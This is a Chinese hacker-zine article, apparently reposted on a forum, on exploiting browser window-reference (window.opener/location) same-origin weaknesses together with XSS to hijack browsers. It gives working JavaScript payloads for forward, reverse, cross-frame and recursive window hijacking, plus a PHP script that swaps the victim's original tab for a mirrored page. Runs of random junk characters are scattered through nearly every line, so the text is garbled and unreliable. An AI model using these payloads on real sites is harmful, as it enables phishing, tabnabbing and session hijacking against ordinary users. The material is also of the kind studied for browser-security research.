==Ph4nt0m Security Team==
( i& g* |5 j' X0 c, v ! d- b! j4 ~" l5 X; e1 i
Issue 0x03, Phile #0x05 of 0x074 ~+ [9 U$ e. n
1 H9 a- ~5 C8 D& g+ Y: \% w4 k- Y( T1 P
|=---------------------------------------------------------------------------=|; D C0 j7 ]0 T. h3 w8 Z
|=---------------=[ 利用窗口引用漏洞和XSS漏洞实现浏览器劫持 ]=---------------=|
5 H* R) Z/ n- n" u|=---------------------------------------------------------------------------=|
7 K8 n1 k2 z s|=---------------------------------------------------------------------------=|; W! y+ B8 _ V$ X6 b8 B7 Y5 F
|=------------------------=[ By rayh4c ]=---------------------------=|6 j. E$ ^0 y/ [& U Q% d
|=----------------------=[ <rayh4c#80sec.com> ]=------------------------=|$ a1 t" W+ q" y' W
|=---------------------------------------------------------------------------=|0 I$ o6 O5 n9 H4 ~' o) P
8 \! M2 R8 L1 A3 C' \% c' w) |4 G+ L7 X# G
[目录]0 \, C! U% S% V& z% Y( I1 N
* Q# M; B) |6 B* s6 s9 W3 E2 w0 q1. 前言$ F3 B- O& E: o+ Q7 }- q
2. 同源策略简叙
) _8 a% C+ ~/ B3. 理解window对象的同源策略
+ r# }, r: m, M% X5 Q4. 窗口引用功能中的同源策略漏洞4 Z" c" U! B' e* A2 v
4.1 父窗口引用子窗口的同源策略问题
9 w1 | g6 A9 L6 W$ t% V0 U 4.2 子窗口引用父窗口的同源策略问题
) d6 }; z3 z$ p# Y7 [4 b5. 利用窗口引用漏洞劫持浏览器) _7 i- m0 M+ _+ O) t5 ~
6. 利用XSS漏洞劫持浏览器9 a% C5 V; }( {8 m) o! @
6.1 正向跨窗口劫持
' f4 t8 b- r7 X/ A* x 6.2 反向跨窗口劫持
: o- H3 M; T/ O 6.3 极度危险的跨框架窗口引用劫持! k# ~0 k3 ]. F) i# q
6.4 极度危险的正反向跨窗口递归劫持
, F# T9 S! }' N% T8 L. P% w& z 6.5 完全控制浏览器5 P: f3 }5 K1 N p- X/ M
7. 后记
3 {" a6 b0 K: c8. 参考+ g) `' [6 X$ J, M: L) r
" A9 |5 l9 G4 j7 {5 E1 x
4 K+ c# W# A7 h一、前言+ `& p; Y! g7 N; [( | m" c# R
+ {: m: t/ G4 n8 ~! A0 s
最近国内关于XSS漏洞的技术文档都比较少,所以决定写这篇文档,其中的很多细节和朋
2 |; ]/ x% }- i n友们都沟通讨论很久了,其中包括了我对浏览器同源策略和XSS的一些理解。XSS漏洞从Session
( r# W) t& d- o. k5 ~6 h/ `劫持、钓鱼、XSS WORM等主流攻击方式发展到现在,告诉了大家一个真正的跨站师是不会被
3 V- u$ O7 A3 q条条框框所束缚,跨站师们在不断的创新,跨站师们会展示XSS漏洞的所有可能。
/ C5 E( J+ V3 c' q# u
2 g; U( f" |8 a( ]% Z1 ]& U6 t3 c3 A# j" u7 X( I
二、同源策略简叙
5 c$ F; J, e5 D- N3 h& D( U* [
8 _3 P2 D( h4 E; e 同源策略是浏览器的安全基础,它是浏览器支持的客户端脚本的重要安全标准,我们可以
0 B; k9 k% p- L: K7 s( I# u从“源”上了解这一安全标准,按照W3C的标准这个“源”包括域名、协议和端口,各大浏览器都* E2 Q6 z4 U# ~ n
曾爆出过很多同源策略漏洞,危害程度各有不同,比如从06年开始流行至今的MS06-014网页木
& I5 p8 a* G' N0 s3 d* ?马漏洞都已经完全颠覆了同源策略。这次的文档主要说的是DOM的同源策略(参考2)中的一个
; w; [/ N4 m! s5 L& w' m% z漏洞,然后从漏洞引申到XSS漏洞如何利用DOM的同源策略特性,最终实现浏览器劫持。5 `7 ?- q' j2 H* d! D
/ X- G% q! `: s6 r( g' L5 r! p& J% R
y' A; ?% Y# h' l& H3 i8 M# ^
三、理解window对象的同源策略4 C4 L0 c7 B$ l# d# B' t; _5 x" b! k
4 K( i' z& R6 O' w9 q! g( y) P* L 窗口即指的是浏览器窗口,每个浏览器窗口都可以使用window对象实例来表示,window对# M5 D' d" G: c. s2 U
象有很多属性和方法,写一个简单的脚本可以历遍出window对象的所有属性和方法:" K$ p5 C2 f6 G' T; t3 W8 H
9 U4 f/ n6 G8 T$ F. s9 r' \
--code-------------------------------------------------------------------------- E( S, E) ^% O' _, ^) l6 q8 `; s
<script language="javascript">4 p4 g$ @% ^- g
for(p in window) document.write(p+"<br>");
% T+ E5 W1 J; C+ b5 d</script>2 _ m2 i7 V& z9 C3 A
-------------------------------------------------------------------------------
, q+ S) e, r: Q! d6 V# {9 U8 o8 k
这些window对象的属性和方法可以改变窗口的外观和窗口网页的内容,当这些属性和方
# P6 U* q! d3 R2 v6 i9 C2 C法只在一个窗口中使用并不会凸显出安全问题,但是当多个window对象开始互相引用的时候,
: Z, g8 k3 Y# r* g7 g! m这些属性和方法就必须遵循同源策略。
A. V% K- D5 g
7 Q7 Y- P( C' m 举一个简单的例子,如果在a.com的网页可以调用b.com网页window对象的属性和方法,那0 E$ e% ~. I- c! i2 k! a: G
么跨站师就可以随便XSS互联网上任何一个网站了,所以为了避免安全问题,同源策略是必须
/ L3 ^+ l1 v- N: Q) \的。我们可以把下面的脚本保存为demo.html到本地打开或者丢到远程服务器上进行测试,这5 D* a, y% K$ O: b3 G3 `
个脚本的效果是调用不同源的子窗口window对象的属性和方法,我们会发现location属性的
' h$ |9 E& y: d值类型是空白的,这种情况太特殊了,说明不同源的父窗口引用子窗口window对象的location
/ D* \6 n& C9 U- Q1 i" q' y$ J属性并没有被拒绝访问。: a2 V( }& j; a7 V1 K; H
% p3 M4 i; Z% E( K
--demo.html--------------------------------------------------------------------
3 Q {% f _/ Q6 T# |0 M<script language="javascript">
) s- m3 e# K1 W: {" |function allPrpos(obj) {
/ d, l4 C' }2 R& G, `( e! f0 Y var props = "<table><tr><td>名称</td><td>值</td>"; $ o# x9 }) G3 {$ O) P0 w! Y ?) t
for(var p in obj){
/ l3 L2 ?; h8 k6 p: J if(typeof(obj[p])=="function"){ 0 g6 S- B* ~9 s# c2 \0 Y
obj[p](); 6 \1 P) k, I7 e1 \6 D
}else{ / N' N* V" r2 L1 m) s
try * L' e' u8 o, i, t; u, L
{
: S& j% [# t" `' `% ` props+="<tr><td>"+p + "</td><td>" + obj[ p ] + "</td></tr>";
, r: u' M0 F% N2 O& u# P; D } * S! N+ f0 y9 v+ v/ z+ r5 y% J
catch (ex)
& U; k h: V% `; ?3 f; k+ o { ; R9 E' a+ q5 A/ C: ]) Z
$ U4 B+ q) C2 D
props+= "<tr><td>"+p + "</td><td>" +ex.message+"</td></tr>"; # t7 W, D5 |* ]
} 2 o* R" V" J) g- v: p& _
* N6 ?9 ^* r3 S" l } ( p; t, R1 {+ z( u: Y
} 3 B* K0 R$ Z; y& D, }/ }/ O Y# A
( K& O+ Z! ?, S# U z/ Y7 t. g
document.write(props+"</table>"); t9 J* N9 K4 ] K; O7 m4 A* m. o
} 0 b: J0 M; _- e, W) k3 G
/ |, V8 E' U" j
function createWin() {
7 ~) V. Z) v4 W. x! b7 s S newWin = window.open ("http://www.google.com"); & i w3 G- ^3 ~( f8 L% i1 ^- H7 B
setTimeout(function(){allPrpos(newWin)},2000);
9 E4 n- A: o% @ f/ V- I6 h}
% B J* i9 _- `" O
( A ]7 Y) R9 _. ]6 N0 R/ J" A g</script>
! f. ^; P; ^# v* p
3 o1 O" H/ R) B8 @1 A<button onclick='createWin()'>创建一个非同源子窗口测试</button>0 A9 I" T& K2 g- @
-------------------------------------------------------------------------------7 h& t' b O J5 S5 A. m/ Q
0 n Z! j( b0 Q
! V8 t* j0 A3 \1 o
四、窗口引用功能中的同源策略漏洞
5 l% I0 Q9 k- |% C3 t0 V0 g
* p7 ` W( Y" \2 C; h4.1 父窗口引用子窗口的同源策略问题8 e8 Q# M1 Z7 @/ q: [$ D/ i: l. C
! \' `/ a3 {: H+ w) F- F
去年我在幻影杂志发过的IE6跨域脚本漏洞,这个问题微软已经发布了ms08-058补丁修复,+ J' |4 n; E) k8 U2 _) S. X6 H
但这个漏洞仍然暴露了父窗口引用子窗口的同源策略问题。根据第二部分的测试,我们知道/ P+ A- d0 W$ a3 _0 @, S
浏览器并没有阻止父窗口访问非同源子窗口的location属性值,我们可以使用下面的脚本进( O4 ^+ {: q/ D* }# F8 H; M8 q& ~3 V
行测试,会发现父窗口可以控制非同源子窗口location属性值。9 \ [) O4 j0 b6 Z+ f! M3 c2 x# C
! @2 N! E _5 T4 h! v# Y--vul1.html--------------------------------------------------------------------9 C) L) H2 E5 c9 D6 n- r) K
<script language="javascript"> ( A4 M( N4 i; l6 U: ^# ^
function createWin() { @, Q5 Y0 t' r) W2 T3 a
newWin = window.open ("http://www.google.com"); 7 t2 Q# d: C) t7 w* I/ s7 Y
setTimeout(function(){newWin.location="http://www.80sec.com"},2000); w" i+ _( p1 q' w6 i
} 5 k/ Z1 m% `( d, {
</script> R4 K, O/ e, t8 R
! ~$ \- v7 \( Q3 d; C, \
<button onclick='createWin()'>创建一个非同源子窗口测试</button>9 H" A( X3 V, \' B
-------------------------------------------------------------------------------
$ j& {: M8 X. H2 q S
3 w! L. k1 P! Z7 S6 [) |) S1 H2 ?: ]2 y7 G# \( M
4.2 子窗口引用父窗口的同源策略问题7 @( i" u9 x- x7 g
7 [' J8 \; G/ Q: j 逆向测试一次会发现子窗口引用父窗口也存在同样的问题,这里为了更方便和直观我使
# u7 n u! J0 [用javascript伪协议进行验证。子窗口引用父窗口的window对象属性是window.opener,我们
( c8 [6 S/ I9 O0 [7 W可以随意浏览一个网站点击链接打开N个网页,在这些网页的地址栏注入下面的脚本,你一定2 P8 E. P$ t3 z4 f0 R" o# ^( x3 ?& F
会惊奇的发现,不管同源还是非同源的父窗口都转跳到了80SEC网站。
1 U3 u/ X" e, G. q2 r" p0 Y) B9 h$ S
--code-------------------------------------------------------------------------
( B$ ~/ e& x4 M7 v ~; c
i: I3 U4 I( K6 T" tjavascript:window.opener.location = "http://www.80sec.com";void(0);4 R2 f) G9 U4 W0 b' |/ |
' G' A5 y+ J* V& v, V2 d$ O& D-------------------------------------------------------------------------------
& y) t! w; M9 k/ |/ L A/ s) o, B& f' B/ t" W0 ^$ X4 g
: V' h: u3 j+ m+ G5 u7 u五、利用窗口引用漏洞劫持浏览器; |) n& W( l. W8 W+ N% T5 }: U4 {9 C
, f# p: P/ v/ X, R4 H 经过上面三个枯燥的测试,我们已经暴露了浏览器一个非常严重的安全问题,非同源的子
- K+ N: S. r# @* `窗口和父窗口可以互相引用控制window对象的location属性值,并没有严格遵循同源策略,那- u, Z: E" ^9 _. B5 ^/ |* N
么用户在浏览器中的所有点击行为都有可能被跨站师变相控制。1 U3 C: B* V* `) T' ]+ y" S
) D( q* r* |. `. i# o4 \
我们打开浏览器访问互联网上的各个网站,无时无刻不在点击链接,我们点击链接想要产
& }3 {8 L+ V$ d7 S7 ~' [生的结果是去访问我们想要去的URL地址,用户的正常点击只会产生两个结果,打开新窗口或1 A/ @" V a R' z( v
者当前窗口转跳,试想一下你在SNS网站、电子商务网站、BLOG、论坛里点击一个正常的链接
- H+ p+ u% A; n. _9 t后,打开了一个“无害”的网页,原本浏览的信任网页却已经被悄悄替换了,大家可以联想一下+ G$ i! ^- Y3 \; D: m
会产生什么可怕的后果。0 k* w5 j2 R3 V; E
6 i8 ]0 m* l) H4 |5 @( e4 c: J: F+ [
下面我写了一个劫持浏览器的小Demo,思路是获取REFERER后生成镜像页面,同时加入我
1 L$ c5 J2 U4 f! }" B* f# s们的劫持脚本。比如把这个hjk_ref.php丢到本地服务器上测试,将http://127.0.0.1/hjk_ref.php
0 `: h$ n( p* q) G1 A* P( Y这样的链接发到任意一个网站上,点击链接打开新窗口,当所有的注意力都停滞在新窗口的时
$ G/ k: {3 p3 E* e* N9 B3 L/ V候,3秒后一个镜像页面将会悄悄替换链接所在页。按照类似的思路,发挥跨站师的想象力,可' w" X1 E# X, t8 @
以做更多的事情,所有的一切仅仅是因为点击了一个链接。
$ K: q* U5 C3 S# s* q* X4 s
0 f; {! T$ @& ^2 R1 S--hjk_ref.php------------------------------------------------------------------" _& m; a9 q o! K
<?php6 |; k# n9 h. D6 A0 J q& E- ]
if (array_key_exists("HTTP_REFERER", $_SERVER)) {
+ I$ |% P' e, R- ~) K$Url_Mirror = $_SERVER["HTTP_REFERER"];/ ~4 t, W! G9 c; E c) l( a! Q
}
9 D4 E0 ~+ y# [6 [if(isset ($_GET['ref'])) {
5 J, U |3 X$ b+ U# _9 Zecho file_get_contents($_GET['ref']) . '<script>alert(\'I had been hijacking your browser!\')</script>';
8 Q% ?0 q9 u$ e}; n' S& |0 `: {. v5 `% @
?>
* B/ ^2 z P* N) {+ X' @; ~) L0 u* a9 Z! c9 y5 L* K
<script language="javascript">: `! y' ~1 k) ]5 L7 l+ ~& {- g
setTimeout(function(){window.opener.location=window.location+"?ref=<?echo $Url_Mirror;?>"},3000);
( G, R' T9 O! z3 \ Q</script>
' q8 G7 l# r3 @1 C2 S: E8 l-------------------------------------------------------------------------------
# r, l2 k/ }* {( x/ P4 J# D9 I- J/ T1 r: ]
注:各大主流浏览器仅opera和internet explorer 8不存在窗口引用漏洞。8 E" l; w: @" i
% l0 o6 Q- p" D+ j+ f2 P/ F4 l2 Y
. L7 h2 Z+ B" u5 s( b6 a六、利用XSS漏洞劫持浏览器
! ~/ l: f- p3 o( O% V3 C `' N" ]% }7 R5 P( v. o) G
延续第四部分的思路,这部分将进入本文的一个重要环节.跨站师们都知道XSS漏洞分为
2 g% h% J3 _( N2 w( `* O, h持久和非持久两种,这两种类型的漏洞无论怎么利用都无法跳出窗口的生命周期,窗口关闭后
3 J/ E, v9 m' K* UXSS漏洞的效果也就完全消失,窗口的限制一直束缚着跨站师们的发挥,我这里将和大家一起
5 `; a9 J1 A: S' h6 }讨论跨站师的终极技巧:
; Z2 Q4 U( U s a2 w4 f
- _. F8 `: e' Z% \0 `7 r3 {, h
, }1 r8 z8 Q: m" u6.1 正向跨窗口劫持& e' R( E h1 m. `
9 w. ~- [( `+ v 大家可以先试验下hijack_open.js这个脚本,比如打开http://bbs.dvbbs.net/动网论坛% [; }& B V0 m! I/ x
主页,我们在地址栏里复制下面的代码使用伪协议注入hijack_open脚本,然后整个页面的链
, }9 y" j3 v8 ^接就都被劫持住了,点击论坛里的任意一个链接,打开的新窗口都会被注入了一个alert对话8 p \ u0 c% w% g& s
框脚本。 # P5 d5 r# Y2 Q$ q2 `" G; ?& k
% v U, x1 e8 \- j* Y& P1 q' o
--hijack_open.js---------------------------------------------------------------
9 T9 a% f: I' i; `% L) V8 f4 y8 S6 ], R# I5 K
javascript:for(i=0;i<document.links.length;i++){document.links.onclick=function(){x=window.open(this.href);setTimeout(function(){try{x.location="javascript:alert('I had been hijacking your browser!')"}catch(e){};return false;},3000);return false;}};void(0);
* e; j; N1 E. d% R. L& T# w) B7 Q* n. B; g; `, N0 J
-------------------------------------------------------------------------------, N, v; F! m& [
: p* W- ]5 ^3 I) Z( d5 `) z. `7 v& e0 m. x4 v
6.2 反向跨窗口劫持
# e; Y/ Z2 y4 |* o8 z. I2 U' w9 L+ S1 I. B( I" O# \2 f, p4 N9 E( G5 p
同样我们也可以在动网论坛试验,新打开任意一个版块的窗口,在地址栏里复制下面的代: } H4 |( z; A* d& O5 j! N. }9 s( ~" Y
码使用伪协议注入hijack_opener脚本,我们会发现原来的页面被反向注入了一个alert对话
, D+ i6 `% q0 c/ [ r框脚本。
: A. u& C0 o0 a' h
& ~! [# w6 {1 v/ Z I3 q--hijack_opener.js-------------------------------------------------------------, i2 B# E0 e2 @' j) [4 n
- G$ |/ {+ Z! z, Z% z+ b
javascript:window.opener.location="javascript:alert('I had been hijacking your browser!')";void(0);* Q$ [) [+ \ ^; V0 \6 X
, k; P8 l: e( j: @+ T* S6 ?4 F-------------------------------------------------------------------------------
7 w( [7 d. I! o3 R* H
2 \3 I+ _+ \8 n; Q2 ^6 N4 U; K
, `+ U0 n6 h' F! x2 v6.3 极度危险的跨框架窗口引用劫持( A0 C' C6 @3 y
3 n( o ]: Z& J t% n+ h/ d3 P; n
非持久型XSS漏洞是在URL参数中注入脚本,一度被认为很鸡肋,一个非持久型的XSS漏洞
2 {- J& o/ n# ^3 J# ?) K: }% o可能出现URL参数过于冗长等缺点,下面这个window.parent.opener的跨框架窗口引用技巧就
( v8 z% }2 P; P% u7 k适用于所有的非持久型XSS漏洞,我们可以在一个被攻击者的信任网站上的网页里iframe一个
$ P$ P) Z; d7 M8 R$ U* L非持久型的XSS,如下:
, C8 p1 u! J5 c/ h" R7 V6 Z9 [2 B; @& R( r0 I6 ~
<iframe src='http://www.target.com/index.php?vul=xss'width='0' height='0'>( Q- D* m. J2 t9 t; P x
4 u4 Z0 j2 U+ M6 j 在vul参数中写入下面的hijack_frame_opener脚本,跨站师就可以反向跨框架引用窗口 h* a$ Z3 x! T% M4 j
注入脚本。- d1 ~% H* L) {
; F( |9 p1 h! F% l* `* j
--hijack_frame_opener.js-------------------------------------------------------
2 l9 q' d O ~/ g! a+ {<script>
( s* M( _, h/ x4 M8 ?# ~2 q% h ]window.parent.opener.location="javascript:alert('I had been hijacking your browser!')";
M7 q' @" E. \! ], C1 M. \</script>, A u# M! q' ?1 t( v; Q/ B$ ?8 |- I
-------------------------------------------------------------------------------
/ t; X9 U% ]/ h3 B
/ d3 o5 R' d' O" w( w% K1 K/ e# X% L$ l, `# \, |2 X
6.4 极度危险的正反向跨窗口递归劫持
: V; U5 t5 A6 ^8 x0 {) l2 L
; z: K0 g; J% w8 @6 ^4 m luoluo建议我加上了这一部分,窗口之间的引用关系可能是复杂的,我们可以通过window l1 q, S2 ^* f4 J: a
的opener属性链反向递归查找窗口注入XSS脚本,将互相引用过的同域窗口全部劫持,并通过: |7 K) k" d' Z' M/ P
异常处理规避之间跨域页面的访问异常,代码如下:9 L9 N! I: G+ k7 o/ \
6 _" o0 Q1 f4 n5 z
--code-------------------------------------------------------------------------- S# S5 t, A' |+ Q6 D* }
5 V$ I K$ W! f3 Bjavascript function(){var w=window;while(w.opener){w=w.opener;try{w.location="javascript:alert('I had been hijacking your browser!');void(1);";}catch(e){}}})();void(0);8 n) {3 A3 O; s/ `6 ` R
% b6 U$ r9 V R+ W# t. H# e-------------------------------------------------------------------------------9 V9 x. M2 y8 Y) k0 a7 H
1 b) B* S5 C5 l) ^: U" | 假设页面打开序列有A域->B域->A域的情况,通过对第二个A域页面的反向递归劫持则可
' m9 a+ D5 ~4 Y( O5 v, o4 A以劫持B域之前的A域页面,从而实现“隔空打击”。
- q; ?& D% h* ^, Y; Q3 ?1 `' o4 D3 S" V- k: u
同理,正向跨窗口劫持也可以实现递归劫持所有同域的链接,对每个打开的被劫持的页面
9 p% W: I6 I l2 W& ]. F$ D5 T m. I执行和第一个页面一样的劫持脚本,但是正向递归没法实现反向递归的那种“隔空打击”。
8 K2 p9 f: J9 Y; o! w7 t, `+ H- Z3 D9 x3 x: ]1 @6 ?
结合正向和反向的链式递归劫持,最终我们可以劫持所有的同域页面。
& ~+ s9 ?" x( i6 a: M0 C) i
( B# u" a% T8 N6 E- h. S$ [8 |* q; F" _; M) |; x
6.5 完全控制浏览器
! H3 `! O# O3 e' g( g( h$ r$ A. G& H- w5 A" m
一个跨站脚本漏洞的真正意义在程序员的角度是输入和输出问题,而在跨站师的角度则) b; }( f% h: Y
是能够进入同源策略了,可以摆脱同源策略的束缚做任何想做的事情。跨站师们可以利用XSS
5 n! ]2 b7 S; c0 s- I漏洞在同源策略允许的范围内再跨页面注入脚本,可以不再为窗口关闭后XSS漏洞的效果消失
4 W7 v& ] e/ C2 E/ @/ s9 h+ p而烦恼,劫持窗口后的跨站师们可以任意发挥,劫持表单,劫持请求,劫持输入等等,我就不再
/ s6 N% X7 e4 }列举实例。无论是持久型还是非持久型的XSS漏洞都是能够发挥最大的威力的,最后实现跨站6 T; r: r4 U5 U# E
师的终极目标 - 完全控制浏览器。
6 z7 x; N3 O1 P, K1 N+ q, W
7 M' \, `; |" F
0 T. Q. M+ s+ x3 K% B七、后记 y$ E- J( U. b2 K( n1 L5 i% S
! o$ y$ P9 N9 p- {9 t" Q 文章涉及的安全技术全部都是纯研究性质,请不要将这些技术使用在非法途径上。安全1 V8 j7 B. X `7 }
与应用永远是一个矛盾体,通往安全的路永远不止一条。感谢对这篇文档的思路和技术给予7 Q- B8 M+ _ R& W0 r/ ~
过帮助的luoluo、cnqing、linx以及80Sec团队的所有成员。
m% M) h, a' }# {5 b7 I7 T& `7 E$ _1 P/ H9 O2 ?
6 t, N) q3 \/ m' O0 ]( s9 A八、参考
1 A/ w6 p- C4 A/ x5 n* Z4 M6 }
) M+ Z) @; `0 a7 a) \# U1. http://en.wikipedia.org/wiki/Same_origin_policy# O, @3 f4 [3 L2 B: j
2. http://code.google.com/p/browser ... licy_for_DOM_access! c) v; j$ n& X- s# g& C
3. http://www.w3.org/TR/Window/
; a6 }6 | {% I1 t4. http://www.80sec.com/release/browser-hijacking.txt
* y1 ~! @# K( {' t. }1 P% e5. http://www.80sec.com/all-browser-security-alert.html$ F* A F5 }: l
6. http://www.80sec.com/ms08-058-attacks-google.html6 Q4 {! |$ B/ E+ r- r4 Z
7 V8 `) ?' @( d1 ]9 P-EOF- |
发表于 2012-9-13 17:10:56
收藏
支持
反对